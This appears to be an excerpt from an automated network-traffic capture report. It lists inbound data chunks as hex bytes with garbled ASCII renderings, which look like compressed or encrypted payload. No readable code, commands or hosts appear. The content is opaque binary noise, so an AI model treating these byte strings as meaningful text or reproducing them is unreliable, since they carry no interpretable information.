2023-11-18 09:02:40 UTC	7924	IN	Data Raw: 23 f6 97 a6 38 a3 b9 c4 5c 5a 64 a2 6a dd 38 85 7d c4 19 a7 50 a4 71 6a 79 e1 5c f8 2a d6 99 10 59 ac 43 0c f5 33 4e a1 71 c4 05 db ac 3c 7b 84 41 5d b2 b0 61 61 7c 1b f4 01 5a da 71 09 bd 18 a9 82 c1 55 4d 3d d6 23 f4 65 ae e6 9a 66 bb 13 ad e4 02 90 09 9c 1f cd af a9 b1 b5 a0 a3 0c 62 cc 77 43 a3 85 be 11 0c eb 56 9b ba a4 89 4d c2 d2 6e af 59 cd 77 44 b8 da 67 73 05 be 2a aa 1d 74 9d 45 f8 9e 01 63 d3 86 16 bb 4d 5d 50 df 8c d3 db 64 46 33 ae f4 57 d8 20 a6 26 20 b0 f3 73 f1 a4 ca 66 53 97 bb ea e9 f2 81 4b 3d a3 d9 da 50 db 00 d9 98 09 92 40 3b 5d 62 06 f9 6b 76 54 3b 16 ab 2b 6d d6 06 07 f6 7b b8 23 82 ef bc 70 22 9b e5 f6 0e 08 55 51 bd 18 e7 7b 29 12 48 ad 90 86 63 41 83 d5 6a 6b a2 b1 b3 14 67 30 95 84 1e f9 6c 15 8b 22 19 07 70 56 9c f5 f6 6a e4 Data Ascii: #8\Zdj8}Pqjy\YC3Nq<{A]aa\|ZqUM=#efbwCVMnYwDgstEcM]PdF3W & sfSK=P@;]bkvT;+m{#p"UQ{)HcAjkg0l"pVj
2023-11-18 09:02:40 UTC	7940	IN	Data Raw: 57 56 11 c5 bf af c9 4a 12 3c 9b f0 56 4d c5 73 1a 8c 36 51 58 07 ad 76 d4 d5 10 c5 18 19 5d 02 95 fa b6 12 c5 15 b2 e1 7f a3 b9 39 73 ad 04 b7 88 21 af 92 8d 7c 83 22 bb e9 bf 16 49 70 5b 53 6b 83 03 24 5f 31 95 45 20 f8 2f 0a 20 a6 b3 c0 02 a2 a5 ae b1 c5 05 79 2b 93 5d 26 4d 6a 91 e0 5f 25 1b d1 2d 21 6f 76 b6 d8 ab 5d b8 f1 81 28 e6 c8 46 df 10 27 45 e1 43 6e 8a 5b 82 7d 17 35 34 51 ef 05 03 bc 1b ab 6f 6b 06 44 dd 40 44 43 13 22 ec 0c a1 b2 54 37 2e b0 2f 74 36 dc 41 94 69 a3 90 d3 e3 5c d5 75 05 e5 68 80 4e c5 a9 78 b6 ea 3e f2 c1 a1 47 93 09 51 8b 08 cb 8c 99 a5 e6 12 b4 64 f2 0b 8b f0 26 0b 55 c9 ec 86 26 d4 28 4e 5c 79 b2 b4 6a 2d 3a 4b 8d a5 a1 d6 d9 62 ab 21 c3 ae 1b f9 f9 b5 e1 69 9c 01 9a 09 3c 0d f6 a5 33 9b 16 36 e1 c5 62 97 55 53 29 a3 9e Data Ascii: WVJ<VMs6QXv]9s!\|"Ip[Sk$_1E / y+]&Mj_%-!ov](F'ECn[}54QokD@DC"T7./t6Ai\uhNx>GQd&U&(N\yj-:Kb!i<36bUS)
2023-11-18 09:02:40 UTC	7956	IN	Data Raw: f8 31 35 53 ef fb f2 65 56 55 66 f5 74 d7 d7 df d3 ef 23 c5 0c f8 2a 7e 01 26 a0 8f 10 fa 16 2c 74 1b 1b 6c ea 8f 92 22 8c d4 b4 c3 06 9b fa 63 32 ce ec c0 60 53 df 4a dc 05 60 7d 68 4b 83 4d fd 71 62 9f 06 06 9b 36 36 d8 d4 b7 13 6b 1d 18 6c da 2d 83 4d 7d 87 ec fa 62 1b d9 cb e9 cf c8 e0 06 5b 65 b0 a9 3f 4b d8 1c 30 d8 b4 15 06 9b fa 73 12 bc d6 56 18 6c ea cf 4b f0 46 09 6a fa 0b c4 fd 0d 18 6c da 51 83 4d 7d a7 64 6e f6 10 4d 7f 91 94 2f 04 83 4d db f3 07 d4 5f 22 f5 cb c0 60 d3 f6 0c 36 f5 97 49 ed 2a 30 d8 b4 3d 83 4d fd 15 19 78 d4 0e 19 6c ea af 92 ae e7 84 c1 a6 15 31 d8 d4 af 27 53 fa 0c b8 74 43 60 6f a9 32 d8 a4 0a 83 4d fd 26 52 3c 03 bc 52 5b 53 60 13 29 1d 0d 6e 98 76 2b f3 cd a4 94 11 06 9b 56 d4 60 53 bf 85 18 7f 0f ae 9e 81 c1 a6 be 99 Data Ascii: 15SeVUft#~&,tl"c2`SJ`}hKMqb66kl-M}b[e?K0sVlKFjlQM}dnM/M_"`6I0=Mxl1'StC`o2M&R<R[S`)nv+V`S
2023-11-18 09:02:40 UTC	7972	IN	Data Raw: 62 0c f2 2c 3c f0 d8 7e 3a 8d bd 52 70 3a 45 18 fb 78 33 6e 10 78 4f 0a cd be c2 e0 4b 79 58 39 83 18 97 f1 14 18 54 9d bb b9 5c c8 cb c8 28 de 45 2d 5f 5b 2e 60 e4 0a 09 b1 5d a2 91 e3 07 c6 95 8a 70 d4 83 14 32 3e 22 61 f0 78 03 4f 86 c3 d5 4a 05 af df 8c ab bc f0 5c 71 b8 88 ab 78 bf 84 80 6f 6c 02 fc 9a 04 90 67 3a 04 b9 5a 42 26 b2 73 30 d0 fd ba 64 a6 35 64 e7 e0 80 1c 08 6f 85 48 6c 43 12 90 9e c7 85 64 0d 67 71 11 0e 4b d0 a1 72 b1 5a 22 81 46 64 04 3a 7f d6 12 cb 6b 54 45 ca cf 8b a4 31 4f a1 16 2a 22 e3 a0 a7 ec ac 62 59 a4 1c 52 95 88 48 39 ec 53 9c 22 6b 5c 5d 1b 22 e9 9a 1a 05 2d 32 af 55 17 ba 48 9a a8 d5 74 44 ea a4 4f 33 12 59 47 fc 6a 54 a4 4d f9 d4 ae c8 9a 96 58 27 e8 38 28 92 ae 13 48 b8 17 db 30 1b f8 66 04 1c fa 8d 18 3e 2d e0 87 ca Data Ascii: b,<~:Rp:Ex3nxOKyX9T\(E-_[.`]p2>"axOJ\qxolg:ZB&s0d5doHlCdgqKrZ"Fd:kTE1O*"bYRH9S"k\]"-2UHtDO3YGjTMX'8(H0f>-
2023-11-18 09:02:40 UTC	7988	IN	Data Raw: 08 bd 96 86 63 0f ed 1f 42 c8 9c 21 d8 43 80 71 1d 8d c2 93 fc 72 21 21 3e 48 ce 3a f0 07 e0 ca cb af 24 6b af 25 64 02 24 e7 92 1a cf 62 58 7d 37 70 1b 26 dd 00 c2 d7 23 00 1c d6 3e 24 b3 ad e1 bb b1 84 dc 07 c9 c9 8e 74 a0 c6 21 f5 07 98 5c eb 21 39 e1 3c ab 03 2f bb 09 39 a9 c8 b9 73 02 21 b3 26 20 3a f4 03 3b 29 b1 3f 47 f2 91 18 3e 91 90 df 21 53 0c 11 ab 38 92 0f ca 5a 58 34 4b a7 a0 b1 de 25 a2 4e 3a d2 c7 df 42 88 eb 16 a4 23 29 0f 49 27 e1 f1 10 92 d8 36 e0 a9 87 81 1c 45 6d e8 eb 4c b9 15 26 e2 ad 92 e3 5d da 80 9c 68 e4 78 a6 12 52 34 15 fb 13 4f e1 6a a4 27 33 7a 31 d0 8b 11 be 7e 31 9b 34 a3 68 06 d2 77 95 10 b2 09 92 03 5c 0f 37 6b 0b 1e 80 74 34 9f 03 16 ff 78 07 1b e7 d1 34 fe c1 1c 7c 9e e2 ac ad 0c 72 4a e9 18 3e 53 97 4f 23 a4 09 12 4a Data Ascii: cB!Cqr!!>H:$k%d$bX}7p&#>$t!\!9</9s!& :;)?G>!S8ZX4K%N:B#)I'6EmL&]hxR4Oj'3z1~14hw\7kt4x4\|rJ>SO#J
2023-11-18 09:02:40 UTC	8004	IN	Data Raw: 22 2c fa 44 88 05 08 f9 4d 84 1a 73 0a 62 ac 03 b8 96 f6 2c 21 27 5f 69 93 cc e7 2d 83 89 e4 d9 33 da ec 3b ce f9 bc 59 28 44 81 cf 47 94 34 9e 8a 36 88 02 3f 41 79 fc 69 75 43 5c 81 dc a2 f5 96 61 b4 44 c4 5b 51 c4 9f 0d 66 ca e6 19 64 ff 14 82 0d e9 df 31 a4 18 51 3d 6b 8b 50 76 1b b8 7f ed 02 65 3b 6d 9c f2 21 c3 3d 12 f7 2d e0 2f 08 b7 8c 50 66 42 dd b0 4f 88 3a 04 eb 6a a1 fc d5 60 22 81 b6 00 fc 15 a1 d6 10 2a 9e 7a d9 1e 80 6f 12 6a 2d a1 12 08 95 f5 a9 10 09 08 a3 de 9a 8c 86 84 66 14 7a d0 5d 23 ca 09 83 ea 43 3e 85 9f 81 f2 53 b0 fc e4 53 f2 39 09 60 33 22 8f d3 d6 f9 31 8f 03 6a a2 44 f9 31 48 30 d5 98 bc 0e 09 c6 fe 61 32 d1 28 c3 d5 44 9b 4d b4 af 0d b1 db 02 99 fd 17 d2 fe 0e 61 dc ec 18 2d c7 bd 80 f6 f0 11 88 a2 93 d0 ea 7b 93 84 18 2f 1d Data Ascii: ",DMsb,!'_i-3;Y(DG46?AyiuC\aD[Qfd1Q=kPve;m!=-/PfBO:j`"*zoj-fz]#C>SS9`3"1jD1H0a2(DMa-{/
2023-11-18 09:02:40 UTC	8020	IN	Data Raw: 7f 8e 6a f8 4d 58 c9 6c 07 c7 1c 9a 62 88 be 50 43 7d 58 17 89 2e d8 93 16 ca 7e 3d 4b d9 84 d7 56 61 64 2d 35 85 a8 53 22 2f aa 1f c3 c5 94 8d 65 a9 fe 48 a9 36 a8 1f 27 a2 79 1d 87 70 61 69 1d 3d 18 b4 9f c7 06 ad f2 44 5f bd c2 06 b8 37 cd b9 6c 1e c3 ab 78 75 11 0d fb 0a 58 75 42 f8 58 a5 8f 11 11 41 38 1e 29 11 91 23 22 c2 f0 7a de 30 76 22 92 3d 45 15 31 f8 8b bc e2 d1 a1 61 52 da ff 75 b9 3d 53 4d 1f 5e ca 2b 9d c4 96 d7 29 7f fc a7 76 c6 1b 1d c6 6c 9e fd db 01 fb 14 6d 63 92 f6 31 86 2d af 10 87 07 98 bd d8 1e b0 aa 94 cb 3f b2 54 b7 be 17 62 c4 01 aa 07 6d 0f 34 61 28 89 09 2a 58 da ee e6 d6 a7 11 d3 34 64 37 46 a5 c5 72 99 02 f4 31 1a 34 91 4b a5 52 bc 6f 77 a7 7b b1 9d aa 13 5d a8 bf 8e 21 7d 54 46 08 e9 5e 4a e3 18 cd 50 b6 87 ab 4e d3 a8 bd Data Ascii: jMXlbPC}X.~=KVad-5S"/eH6'ypai=D_7lxuXuBXA8)#"z0v"=E1aRu=SM^+)vlmc1-?Tbm4a(*X4d7Fr14KRow{]!}TF^JPN
2023-11-18 09:02:40 UTC	8036	IN	Data Raw: d7 d5 82 a3 61 b1 ad c3 cb f4 d3 4b 2b e7 32 ef 79 cd bc da 75 e7 f6 86 ce c6 06 bc e9 94 6e 4e 35 b8 68 6b bb fb e8 a8 6d 7b 5a da 9b 32 0c 43 2f cf 01 ca 50 8c fb 68 ca 59 38 00 16 fb 5e e7 7a 3e a1 9e e5 83 9f 61 e1 7a ad 0c 35 21 18 97 e8 27 77 6a a0 e3 a3 b9 f3 c9 b7 a3 88 4e 61 47 b9 f1 46 6d 5f fc 24 6f 93 15 ad d6 90 cc b3 92 00 68 73 52 32 20 6e c1 85 d6 54 52 e0 75 0c e8 8a 7a 59 bd 03 90 85 d2 92 81 db e4 45 6d 42 9f 50 77 5c 3f bc 92 b6 2f de 7c 86 18 9f de c1 a9 c4 54 73 2e 1f c1 18 30 af 2c 96 fe b5 80 3c c0 75 3e d7 8d ad 3c ef 09 43 7c 19 9d 88 79 f5 80 73 74 7a 21 6b 17 5b 06 f8 68 70 00 cd 42 56 2e 5d 66 45 9c 4b 00 f3 a7 48 63 6e 4c e6 f7 91 d8 36 81 be 9b fd 0f 43 ed d2 30 af 28 89 aa 3a be 1e 9d ec b8 d3 a6 49 e3 66 39 ed dd 48 25 a6 Data Ascii: aK+2yunN5hkm{Z2C/PhY8^z>az5!'wjNaGFm_$ohsR2 nTRuzYEmBPw\?/\|Ts.0,<u><C\|ystz!k[hpBV.]fEKHcnL6C0(:If9H%
2023-11-18 09:02:40 UTC	8052	IN	Data Raw: f4 b2 c8 03 1e 16 c2 e1 fa d2 65 bc 1b 9b 98 70 a3 12 ff 7d 4d 4e 94 bf 12 05 ff 6f 3f d9 21 60 46 97 7a d6 0a e4 31 9c 21 06 30 27 d7 4f 71 ef 39 e8 c6 46 a6 c9 e8 c8 49 e5 96 18 8c c4 26 66 9a b2 8a 07 23 b1 8a 99 a6 ec e2 c1 48 54 09 d3 54 9f 1b 8c 44 b3 30 4d 49 e4 60 24 b6 31 d3 94 75 3c 18 89 75 cc b4 1d 67 b8 41 73 30 9a ea 07 cd 41 2d 98 83 6e 04 e5 ab 94 9c 0e 3a 4f 27 d3 d4 2a e7 a0 13 5b 9b 10 83 99 0b 2a 93 79 30 12 93 99 69 2b e7 bb f1 77 50 79 3c 4c 62 b1 f7 91 0f 46 a2 12 f9 2a 51 8a 9c 54 dd 61 30 12 2b 9a 69 ca 8e 1e 74 03 34 d3 80 fe 5c 68 af fa 9e 33 e8 06 6c 2e e8 7a cd e4 e4 ac c4 c4 ce ae 17 4b 2b 16 a4 bd 11 9a f6 3b 40 d2 8d 6e 22 9f 16 ab ca a0 7e 50 4e 8b e9 64 d0 ce 7a 31 58 d3 62 14 19 54 4c 22 83 7a 2b 35 ed 47 e1 ec 7a 3f 0a Data Ascii: ep}MNo?!`Fz1!0'Oq9FI&f#HTTD0MI`$1u<ugAs0A-n:O'[y0i+wPy<LbF*QTa0+it4\h3l.zK+;@n"~PNdz1XbTL"z+5Gz?
2023-11-18 09:02:40 UTC	8068	IN	Data Raw: 3d 99 ac 0e e5 fd 58 0b 29 d3 f0 8c b6 ff e9 20 a4 4d 20 dd b4 8f 12 c8 bb 74 ab 56 2d 19 a5 0e 1e d0 92 d8 95 e4 aa 27 90 cb 08 69 16 c8 12 42 7a 05 92 4f 48 e1 b3 8c 60 12 5e 8c 99 5a aa 32 c2 24 94 9a 68 4d 3d af f3 b1 e8 1d 64 9c 60 98 04 c7 2c 96 84 31 69 ef f7 62 02 eb fd 32 a5 df 1f 4c b6 84 bf c2 96 5a d8 15 76 82 22 c3 44 dd cf 13 b5 2e 4e 3a 6f c3 7b c8 3b a4 a9 eb 30 d3 43 c6 b0 1e b2 3e f0 4d 3c 4c e6 7d 3c 99 b9 b7 14 b9 b7 f9 56 64 88 d9 dc b9 92 2e 89 14 62 4e 6f 9b af 9a 44 da af 1c d4 27 41 25 54 1d fb b9 68 27 61 c3 5c 6b 20 09 a3 8a ac 4f 50 e6 84 ef 13 5c 96 f0 d7 b8 9e f9 cc c1 1f 1a f6 1b d4 9d 1e 13 ee 14 c7 32 77 d2 40 8b b9 f3 58 9c 7c b6 99 9d fb d2 64 76 ee 8b 02 f7 6f 78 ee cb f8 b9 27 52 64 78 5e 6b 16 b0 f3 ba 0b ce 8b 79 ea Data Ascii: =X) M tV-'iBzOH`^Z2$hM=d`,1ib2LZv"D.N:o{;0C>M<L}<Vd.bNoD'A%Th'a\k OP\2w@X\|dvox'Rdx^ky
2023-11-18 09:02:40 UTC	8084	IN	Data Raw: 0d b0 c0 10 42 93 f0 c1 d6 1d 1e f4 64 21 4b 43 1b 40 d0 bf 6d b3 c3 30 d5 5a 1f c5 89 7a 3b 7c b6 d6 7b 68 5c 09 9f 9d be 0a 85 03 6f df 0a bc 41 b0 9a 0e 94 0c 5f 05 28 f3 d1 b0 73 73 18 8c 63 3a a0 74 df 67 1f d5 08 df 90 6a d1 b7 ba 8d 93 72 94 f3 67 7b 25 7e db bd 1b f6 6e d8 1b 6f af b2 31 8e a5 b5 3e 8d 8c d7 57 98 48 ff f3 45 85 f1 97 ee 60 74 2a 60 9f 24 21 15 0b a4 3b d8 e5 d3 db 69 c2 dd 7f 9b 65 85 1d 56 cc 80 87 60 d8 a3 6b 49 03 fe 63 30 e3 a5 81 d1 90 34 2e b6 1b 0d 0e e3 5c fa 9c 5f 09 16 ed d0 e7 7a ed 14 73 24 0a 05 16 cc 96 28 50 a2 84 62 2a 0d 9c 9b 7d 6a 30 6a 6b 0e fb 47 13 78 25 88 f0 09 2f 84 4c 0c 59 76 02 41 a1 9e b3 54 72 34 09 93 78 f4 93 b7 49 8a 1c e9 00 88 13 91 3a ef 2b 24 c1 59 42 82 5f 15 91 e0 9a e3 50 82 03 86 cf 3e 18 Data Ascii: Bd!KC@m0Zz;\|{h\oA_(ssc:tgjrg{%~no1>WHE`t`$!;ieV`kIc04.\_zs$(Pb}j0jkGx%/LYvATr4xI:+$YB_P>
2023-11-18 09:02:40 UTC	8100	IN	Data Raw: 98 15 a5 1d 86 08 f8 86 78 c1 e2 28 b5 1c 7d 8c 8b 84 84 2c cc 40 19 5b 7d f4 2c 79 cf ea ad 14 f0 35 7b 95 94 57 6d 12 ed 66 65 3c 5a 9e c7 19 45 50 d5 2f 04 6d fa 85 23 2e 7a 38 95 8a dc 21 37 8b 3d f2 5f 51 df 9c 22 32 5c 98 61 b1 96 11 58 12 5c ef a8 e6 13 1f 6c 01 f7 18 b6 cc 91 ef 99 a6 f0 4d 8e d5 98 df 2e 0f b8 cd 8f a2 17 aa 68 60 72 ee aa d6 d3 48 2d ad 9c 89 39 79 91 e7 7b b0 9f 94 d7 39 e8 f7 bb 50 dd 32 3a 2f 02 61 89 22 74 0a c2 c7 34 a4 b8 e5 72 a0 cd d4 02 1c 58 a8 9f 94 77 19 43 f8 27 dc 86 d2 56 45 ac 1d e1 ec d9 98 d5 4b 29 df ae cd 7f 81 5c ae 4c 40 52 6d f5 2a ea 5f b8 83 26 8c 9b bd 80 b1 8c da 62 15 f3 18 25 ec d5 89 24 ad 5c 86 26 27 0f 70 93 93 9f 31 19 f7 23 7c 73 54 cf 78 e1 68 96 d7 a0 e4 15 a7 69 8d c1 6b e7 6a c3 b0 81 30 4c Data Ascii: x(},@[},y5{Wmfe<ZEP/m#.z8!7=_Q"2\aX\lM.h`rH-9y{9P2:/a"t4rXwC'VEK)\L@Rm*_&b%$\&'p1#\|sTxhikj0L
2023-11-18 09:02:40 UTC	8116	IN	Data Raw: d5 e5 ed ba c1 97 aa 23 67 6a 9a e3 dc 7d c4 b7 7c 4e 18 0c 82 3e 53 b3 07 68 77 fd 41 ea b9 19 b4 9a 9c 83 3d c2 6b cf 8e a5 f9 bc d2 d7 c6 46 5c f7 b0 af c6 c9 04 8a 2e 35 3f 7e d4 fa f1 9b bf 97 1f df b8 77 28 fe 5a 97 cd b0 58 36 e8 60 85 33 84 35 fd 74 e1 29 0f d6 d6 e5 d2 05 bd 90 72 2f 1e c2 e9 45 45 20 fe 2a 65 a5 cb 58 52 cd 40 d6 b0 a0 bf 76 7c e1 1d 0c 3a 41 be f3 01 39 b5 29 ab 5a 66 c9 b3 22 a9 d0 45 ca aa 96 2a 58 d5 b2 e9 7f 1d bc 81 1b 3f 00 82 65 71 05 a3 fc 40 6f ca 0c 43 ad 9c 61 e8 fe 21 d8 3f 9c 6e 75 6d 1d e4 f3 67 4f 1b 28 0d 54 f8 27 43 b9 3d 7d e4 b4 ef d4 dc 8c d3 d8 ea 65 31 2b 37 e6 2c 86 57 fa 5b 55 63 1e ac 6b 06 87 35 41 36 4d d7 fe 83 c6 74 a9 12 6d 1b bb bb 47 d4 b3 66 05 9f 35 17 8d e5 20 9d 01 17 fd 4f 8b d9 83 bc d9 83 Data Ascii: #gj}\|N>ShwA=kF\.5?~w(ZX6`35t)r/EE eXR@v\|:A9)Zf"EX?eq@oCa!?numgO(T'C=}e1+7,W[Uck5A6MtmGf5 O
2023-11-18 09:02:40 UTC	8132	IN	Data Raw: 01 9a c7 0f a3 76 d6 0f 59 de 67 20 6f 6d 96 a6 65 4c ad 4c 0d 19 09 de c2 08 26 ae a7 78 79 16 ae e2 67 e1 3a ac bb ae 34 e2 4c 0c f1 3d f0 cd a0 30 15 40 ab 93 af c4 5b e2 36 59 14 44 e4 5c 23 22 60 3e e0 d6 03 2b b1 92 13 e4 57 8c c1 b8 8a 6e b0 2c 7e 54 95 a4 ff 33 24 c2 86 78 62 f2 7c a4 93 7d 59 d3 3f ec c3 6c 4e 8f 9e 06 45 e1 a5 bf e8 b6 eb 73 f0 9f d0 24 b0 ae 36 bb 37 d8 c0 71 c1 16 37 f9 56 a0 87 94 bb ea c7 9e 72 01 f2 18 6c 69 ab b3 cd 67 9e 72 89 e9 6a 3d 7b 24 cd 99 22 e4 34 9e c2 69 6f a4 b2 b7 e5 5a 14 fc 53 17 6d fa 37 97 c6 f6 90 de 08 7a ff f1 f0 69 15 54 4e cd b0 4b ce 82 00 67 23 c9 7a 52 c8 7a d3 90 bd 2e 2d 59 d4 28 3c db 95 02 f4 f9 e4 01 10 af 17 dd 2a c0 bb 8a 60 a2 4c 91 ae e2 54 fc 28 0a 11 38 7c 45 65 92 af 67 cd af 5b 56 86 Data Ascii: vYg omeLL&xyg:4L=0@[6YD\#"`>+Wn,~T3$xb\|}Y?lNEs$67q7Vrligrj={$"4ioZSm7ziTNKg#zRz.-Y(<*`LT(8\|Eeg[V
2023-11-18 09:02:40 UTC	8148	IN	Data Raw: 38 dc 2b e1 10 7e 93 e3 a0 02 0e 78 a1 e3 21 32 f0 57 3b e0 13 23 95 1f 68 d1 c9 28 c7 1d 60 d2 5a 49 9e 9c 48 22 8f dc 47 8c 84 55 96 27 b9 8f e4 99 dc 47 e2 d9 11 fe 75 6a 8c 6f 00 24 46 e6 0f 63 8d 5a 24 c9 73 33 90 1b 77 49 13 da 8d ad 01 13 33 28 a8 e9 f1 2b 75 72 94 fc 9d 9e 1c 2d 16 df ee 37 a4 0d 48 03 3e 92 01 a7 8f e4 19 91 7e 07 88 5a 26 89 9a 5e 47 64 ba de 4e b0 bc 21 7e 5d af 83 17 36 8a 42 ad 7e 85 5c 33 4f 27 a7 60 85 b5 72 32 fa 6e e3 d2 f6 26 33 e3 ca f9 9c 66 50 81 0c 4c 88 18 40 28 5a 36 9d 17 c1 d3 c9 b2 98 9a 68 cc 86 fc 0c 3a 95 6b 1a b3 22 89 9a fe 67 a1 4a 49 5d e4 ab 96 e3 03 c5 55 0b f7 95 6e 90 8c 88 b4 86 dc 86 b4 be 78 94 3e 7e c2 86 c6 4d 9e b0 d6 fa ad 16 13 e3 99 35 9e 66 30 a5 6b 90 0f a6 06 eb c1 34 ff 00 eb 94 9b 5a 86 Data Ascii: 8+~x!2W;#h(`ZIH"GU'Gujo$FcZ$s3wI3(+ur-7H>~Z&^GdN!~]6B~\3O'`r2n&3fPL@(Z6h:k"gJI]Unx>~M5f0k4Z
2023-11-18 09:02:40 UTC	8164	IN	Data Raw: 09 f7 61 25 f8 20 67 60 9c c1 3d 49 cf 6f 02 cb 2a df 9d 87 a6 72 9a a0 01 07 97 e1 ab 49 18 ed 50 b3 c4 d8 9b 34 cc dc 8d cf 63 4e 82 b1 d3 0a c6 cb fe 20 45 e9 a2 8d 6b cd ed 7d cc 91 34 90 eb a2 cd 95 7c 02 ac 53 20 cf ac 76 77 8f 24 59 9f 38 cd b2 f9 b6 a4 61 2e ea c5 94 94 5a dc c0 fc 34 33 f3 e3 04 a6 91 4d 6a 28 2e da 65 cc 06 fa 94 a9 8d 0f ca e3 47 b9 c5 0a 55 8e ba 96 6d 54 8e 32 95 a3 49 dd 13 fe aa be 40 fe a3 83 b2 a0 6f 95 45 f7 b8 66 73 1a 85 ee 26 06 b5 42 06 b5 5e b9 99 41 ad fd df d3 8f 72 0e 8e 06 97 e0 d6 23 bc 2c 3e 59 91 e2 d4 35 d1 4b c8 6c d1 4b 34 f0 98 55 d3 7c 39 c3 41 da f1 d9 96 5b c7 37 20 cb f8 ae a5 f1 b9 5f 2b ef 58 1e f4 95 a5 3b c7 a4 ed 51 f7 09 eb 28 78 0b 53 fb 2b e4 fe e6 73 7f c3 b3 f4 f7 e9 63 ca 3a e2 eb 1c 9b 4d Data Ascii: a% g`=Io*rIP4cN Ek}4\|S vw$Y8a.Z43Mj(.eGUmT2I@oEfs&B^Ar#,>Y5KlK4U\|9A[7 _+X;Q(xS+sc:M
2023-11-18 09:02:40 UTC	8180	IN	Data Raw: 39 a9 db 83 d9 75 64 f3 95 44 1b 81 50 3a d7 13 c4 b8 6b e1 df 24 31 75 07 f5 41 27 d5 d2 80 74 4f e3 bb 30 0a b8 a0 47 76 63 c8 14 a9 be ea 57 71 5d d6 2d ba 3b 06 11 23 ed f4 9d 3a c3 19 a9 e8 7a 19 90 6a 03 cb 13 f8 77 08 5a 68 29 ec 7b 11 24 4a a7 21 5e de 37 bc 2f b4 b0 9b 26 20 f2 0e 8b 21 0a 8b 87 d0 7d 3b ff d8 13 05 cc 03 7e 18 05 9e fd e3 ff 21 85 bd f6 8c 82 0a b7 23 45 f5 c1 e8 2e e1 08 81 a2 05 e3 d8 7c e4 fb c1 0b 14 48 81 7c de f2 47 86 0a 89 a3 88 0b 2a d8 b1 47 4c c1 76 34 42 c7 1f ee d1 ed 53 4c 3d 7a de 37 f4 cf bc cb f7 0f e4 b2 cb cf db 01 c2 26 82 30 5e a7 76 f9 5b f2 3a c1 0e a2 5f 96 29 cd 3b 3f 4c dc 5c 11 26 9d 15 37 ef f1 fe ac c5 79 79 50 e5 6d b8 a6 c0 ce 97 76 a8 fa 21 10 a6 70 b3 7e 0d ca e7 c3 bd e5 24 9d 07 78 03 a3 a5 cf Data Ascii: 9udDP:k$1uA'tO0GvcWq]-;#:zjwZh){$J!^7/& !};~!#E.\|H\|G*GLv4BSL=z7&0^v[:_);?L\&7yyPmv!p~$x
2023-11-18 09:02:40 UTC	8196	IN	Data Raw: 79 93 d5 aa 55 13 c5 04 15 7b 2d d5 a1 4b 52 dc 61 ef 1c 9d 67 b1 3e ee 02 f5 fe 6e d1 7b 7a 80 a2 6b f2 2e b8 ec 3c 72 59 74 7d c9 3c 69 24 21 4e c4 b5 20 03 09 ea c4 df d7 b9 cf 63 1e f1 f7 f5 ae dd f6 48 18 b8 a7 ea 07 b0 db 4c 74 e8 c2 c9 6e ca d0 e1 45 72 78 82 28 45 f6 b1 7b f6 7a 36 a7 88 42 35 e1 f9 22 f7 9e b5 37 e0 fc 77 37 af bd c6 b2 4b da 29 ce af c7 a9 1e 57 1f 57 47 d3 0b 8f 20 a5 93 03 81 0c c0 ec d9 dc 85 be 4b 47 97 e5 ac bd 19 8f 7e db 4d 7a df 7d 26 12 85 c9 31 4c 93 ef 9d eb 65 8f 2b 49 be 3b c7 d2 d2 03 87 3b 23 ae 5d 74 7f 30 50 10 64 70 72 af c7 7b 89 75 e2 a6 06 3e ed 75 52 a3 f8 bb da b1 e8 7b c6 84 ca c9 bb c2 55 97 6f ae 03 a2 fb 32 73 f1 63 7a 67 0c 77 33 3a 07 12 8c 5f 46 1e ab 52 9c 01 bd f3 ab 31 ba fd c0 90 d7 48 ad d0 b0 Data Ascii: yU{-KRag>n{zk.<rYt}<i$!N cHLtnErx(E{z6B5"7w7K)WWG KG~Mz}&1Le+I;;#]t0Pdpr{u>uR{Uo2sczgw3:_FR1H
2023-11-18 09:02:40 UTC	8212	IN	Data Raw: e0 ab a3 84 6d b8 f6 92 55 04 68 99 d1 e6 58 c1 77 51 6d 05 40 44 f2 30 25 c6 97 f7 dc d7 86 06 60 2f 95 e7 11 be 30 b1 1b aa 15 96 2e 62 e5 b3 e6 d1 21 db 07 f0 de cf 3b c4 82 1d f0 7c 08 cf 5e 78 f6 c3 73 04 9e 2b 12 fe ff e7 f1 41 7b 4f c3 73 1e 9e cb f0 e8 21 6e 08 3c a8 12 e2 67 b2 63 61 4a c5 71 09 a1 00 ad fb 81 d8 69 98 a6 d1 88 d6 26 39 45 88 f1 c2 d4 a9 a1 bf c7 56 4c 21 db d4 3c a4 fe 6b d6 18 c7 56 dc ae fc e6 b2 25 17 21 10 3b d1 e8 82 09 16 7d 7d ba 9d 49 18 82 d0 77 96 be 53 27 a3 96 c5 5e aa e5 b9 4c b7 a6 51 aa ca b3 47 a3 d3 98 c4 78 68 89 76 ed 22 4b 55 a5 c8 1c 2a a6 28 e2 de 0f a7 bb 5d 4d c7 bf a3 61 78 1e f9 a1 c9 96 05 6b 41 c3 cd b2 89 65 66 f3 99 26 e7 b1 55 e6 94 65 97 68 b9 9e 9c 22 24 af a3 2c b4 9e 42 5b 01 25 51 e2 ca ad 85 Data Ascii: mUhXwQm@D0%`/0.b!;\|^xs+A{Os!n<gcaJqi&9EVL!<kV%!;}}IwS'^LQGxhv"KU*(]MaxkAef&Ueh"$,B[%Q
2023-11-18 09:02:40 UTC	8228	IN	Data Raw: fb dc 64 af 85 fc 45 c2 4c 71 a3 f8 97 68 96 46 4a 63 a4 87 a5 27 a5 57 a4 b7 24 93 e3 4b 47 83 fa a2 7a 8c 13 91 01 49 c7 e7 6e 8e cf 54 b4 06 e1 e9 43 36 fa 7b c6 ce f6 b2 13 f8 19 7c 15 df 2f 50 62 b3 74 aa b4 4a ea 75 6c 55 3f 52 bf 54 7f 57 13 b5 e3 9d 77 3a d1 7a 32 a4 e8 0a 2e d3 36 d9 36 dd d6 69 3b d7 86 ec d9 f6 7c 7b ab fd 07 fb 4d fc 31 c2 87 c2 13 e2 4f 62 95 d2 a4 f4 29 27 2b 17 2a 97 29 d7 ab 77 a8 07 d5 d3 b4 73 b5 4b 40 7e fe d4 56 3a cf 74 ae 75 5e ed dc 83 db b2 05 21 1f fc c9 a4 cf a3 2f a5 6f a4 6f a3 8f e5 ef e2 5f e4 cd 42 a6 30 46 98 28 fc 2a ac 95 7e 96 fe 92 32 1d 23 1d a7 3b be 71 fc ec 30 cb 99 f2 85 f2 a3 f2 53 f2 6b f2 db f2 bf 94 37 d4 ef a0 6d c3 b4 02 98 87 43 da 34 5c e6 0e b2 34 d1 ab a2 47 fa 54 fa c6 81 f6 40 ff 20 fd Data Ascii: 